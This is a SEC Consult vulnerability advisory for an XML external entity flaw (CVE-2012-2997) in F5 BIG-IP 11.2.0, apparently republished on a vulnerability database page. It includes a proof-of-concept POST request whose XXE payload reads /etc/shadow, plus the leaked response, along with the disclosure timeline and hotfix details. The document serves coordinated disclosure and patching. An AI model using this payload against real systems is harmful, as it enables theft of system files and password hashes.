F5 BIG-IP 11.2.0 XML External Entity Injection

2013.01.23
Credit: S. Viehbck
Risk: High
Local: No
Remote: Yes
CWE: CWE-200


CVSS Base Score: 4/10
Impact Subscore: 2.9/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

SEC Consult Vulnerability Lab Security Advisory < 20130122-0 > ======================================================================= title: XML External Entity Injection (XXE) product: F5 BIG-IP vulnerable version: <=11.2.0 fixed version: 11.2.0 HF3 11.2.1 HF3 CVE number: CVE-2012-2997 impact: Medium homepage: http://www.f5.com/ found: 2012-09-03 by: S. Viehbck SEC Consult Vulnerability Lab https://www.sec-consult.com ======================================================================= Vendor/product description: --------------------------- "The BIG-IP product suite is a system of application delivery services that work together on the same best-in-class hardware platform or software virtual instance. From load balancing and service offloading to acceleration and security, the BIG-IP system delivers agilityand ensures your applications are fast, secure, and available." URL: http://www.f5.com/products/big-ip/ Vulnerability overview/description: ----------------------------------- An XML External Entity Injection (XXE) vulnerability exists in a BIG-IP component. This enables an authenticated attacker to download arbitrary files from the file system with the rights of the "apache" OS user. The BIG-IP configuration even allows access to the critical /etc/shadow file which contains the password hashes of users. Proof of concept: ----------------- The following exploit shows how files can be extracted from the file system: POST /sam/admin/vpe2/public/php/server.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143 <?xml version="1.0" encoding='utf-8' ?> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message> The response includes the content of the file: <?xml version="1.0" encoding="utf-8"?> <message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType ' root:--hash--:15490:::::: bin:*:15490:::::: daemon:*:15490:::::: adm:*:15490:::::: lp:*:15490:::::: mail:*:15490:::::: uucp:*:15490:::::: operator:*:15490:::::: nobody:*:15490:::::: tmshnobody:*:15490:::::: admin:--hash--:15490:0:99999:7::: ... Vulnerable / tested versions: ----------------------------- The vulnerability has been verified to exist in the F5 BIG-IP version 11.2.0. No modules have to be enabled for successful exploitation. Vendor contact timeline: ------------------------ 2012-09-07: Contacting vendor - reqesting PGP/SMIME key. 2012-09-07: Vendor provides case number and PGP key. 2012-09-11: Sending advisory draft and proof of concept. 2012-09-20: Vendor has a fix for the vulnerability - will be released "with different hot fixes for different releases". 2012-11-21: Vendor announces that fix will be provided with 11.2.0 HF3 and 11.2.1 HF3. 2013-01-22: SEC Consult releases coordinated security advisory. Solution: --------- Update to 11.2.0 HF3 or 11.2.1 HF3. Patch information is also available at: http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html Workaround: ----------- No workaround available. Advisory URL: -------------- https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Unternehmensberatung GmbH Office Vienna Mooslackengasse 17 A-1190 Vienna Austria Tel.: +43 / 1 / 890 30 43 - 0 Fax.: +43 / 1 / 890 30 43 - 25 Mail: research at sec-consult dot com www.sec-consult.com EOF S. Viehbck / @2013

References:

https://www.sec-consult.com
http://support.f5.com/kb/en-us/solutions/public/14000/100/sol14138.html


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top